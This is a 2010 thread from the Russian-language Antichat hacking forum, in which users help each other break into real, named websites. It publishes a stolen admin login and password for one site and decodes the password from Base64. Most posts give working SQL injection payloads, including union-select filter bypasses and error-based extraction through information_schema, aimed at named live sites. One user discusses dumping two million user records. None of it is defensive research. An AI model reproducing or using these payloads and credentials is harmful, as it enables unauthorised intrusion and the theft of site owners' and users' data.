ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12621  
Старый 18.04.2010, 18:51
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

Translate!!!!!

Всем приятного времени сутак )
Сразу к делу ..

Черес уязвимост получил логин и парол админа но когда пробую заити как админ говарит што парол/логин непатходит...

Вот сам сайт :ww_w.zhengazeta.by/magia_gadania/category/89

Login: admin
Pw : eXoyMDA4

Настораживает присутствие в сочетание пароля (MDA)... возможна ветом проблема ?

Вопчем уже не первый раз такое , посоветуйте как распознавать разные типы паролей если они зашифрованы ... или что именно не пускает зайти

Силна не пинайте .. спс
 
Ответить с цитированием

  #12622  
Старый 18.04.2010, 19:06
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Login: admin
Pw : eXoyMDA4
Пароль в BASE64, "yz2008"
 
Ответить с цитированием

  #12623  
Старый 18.04.2010, 19:57
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Как здесь можно обойти фильтрацию?

http://www.vino-concept.ch/content.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+frfromom+info rmation_schema.tables+--+
 
Ответить с цитированием

  #12624  
Старый 18.04.2010, 20:11
Аватар для Hk4q5
Hk4q5
Новичок
Регистрация: 12.11.2009
Сообщений: 14
Провел на форуме:
31928

Репутация: 1
По умолчанию

http://***/view.php?abc=1version()&def=ghi

FUNCTION ttt.1version does not exist

view.php?abc=1version0&def=ghi

Unknown column '1version0' in 'where clause'

что делать?)
единицу нельзя убрать в переди)
 
Ответить с цитированием

  #12625  
Старый 18.04.2010, 20:51
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

Translate !!!!!

Спс Pashkela , Вопчем пропустить через все кодировки ?
 
Ответить с цитированием

  #12626  
Старый 18.04.2010, 21:19
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от Hk4q5  
http://***/view.php?abc=1version()&def=ghi

FUNCTION ttt.1version does not exist

view.php?abc=1version0&def=ghi

Unknown column '1version0' in 'where clause'

что делать?)
единицу нельзя убрать в переди)
1/**/version0&def=ghi так идет?
 
Ответить с цитированием

  #12627  
Старый 18.04.2010, 21:47
Аватар для Hk4q5
Hk4q5
Новичок
Регистрация: 12.11.2009
Сообщений: 14
Провел на форуме:
31928

Репутация: 1
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
1/**/version0&def=ghi так идет?
нет так тоже пробовал.

делаю запрос

Код:
 http://xxx/xxx.php?abc=1%version()&def=ghi
получаю в исходном коде :
Код:
<input type="hidden" name="id" value="1%version()">
Код:
1/**/OR/*d*/user=root

Unknown column 'user' in 'where clause'

Код:
1/**/OR/*d*/author=id

<input type="hidden" name="id" value="1/**/OR/*d*/author=id">

не пойму



P.S урл дать не могу сайт почти копия milw0rm.com
:P


всем спасибо сам разобрался:
+and(select%201%20from(select%20count(*),concat(us er(),floor(rand(0)*2))x%20from%20information_schem a.tables%20group%20by%20x)a)--&

Последний раз редактировалось Hk4q5; 18.04.2010 в 22:31..
 
Ответить с цитированием

  #12628  
Старый 19.04.2010, 08:52
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+version()),floor(rand(0)*2))+From+menus+Group+By+2)a)
а дальше как ??

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+/*!table_name*/),floor(rand(0)*2))+From+/*!information_schema.tables*/+Group+By+2)a)

не получается..


http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+Table_na me),floor(rand(0)*2))+From+Information_Schema.Tabl es+Group+By+2)a)

и так не получается..

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+tAbLe_Na mE),floor(rand(0)*2))+From+iNfOrMation_SchemA.tAbl Es+Group+By+2)a)

и так..
 
Ответить с цитированием

  #12629  
Старый 19.04.2010, 09:58
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Цитата:
а дальше как ??
Цитата:
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+table_Na me+from+information_schema.tables+limit+24,1),floo r(rand(0)*2))+From+menus+Group+By+2)a)
[-_-]
 
Ответить с цитированием

  #12630  
Старый 19.04.2010, 14:28
Аватар для durito
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

Feldmarschall, что 4 ветка я знаю, даже знаю имя таблицы где лежат данные юзеров.

тянуть 2 ляма юзеров слепым это жесть
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ